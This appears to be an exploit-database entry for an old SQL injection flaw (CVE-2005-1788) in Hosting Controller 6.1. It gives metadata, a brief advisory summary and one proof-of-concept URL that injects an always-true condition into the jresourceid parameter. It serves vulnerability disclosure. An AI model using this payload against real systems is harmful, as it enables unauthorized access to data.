Hosting Controller 6.1 - 'resellerresources.asp?jresourceid' SQL Injection
Author: GrayHatz Security Group
type: webapps
platform: asp
port:
date_added: 2005-05-28
date_updated: 2013-05-27
verified: 1
codes: CVE-2005-1788;OSVDB-16914
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/13806/info
Hosting Controller is reported prone to multiple vulnerabilities. These issues can allow an attacker gain unauthorized access to data and carry out SQL injection attacks.
These issues reportedly affect Hosting Controller 6.1 HotFix 2.0 and prior versions.
http://www.example.com/admin/hosting/resellerresources.asp?action=2&jresourceid=1%20or%201=1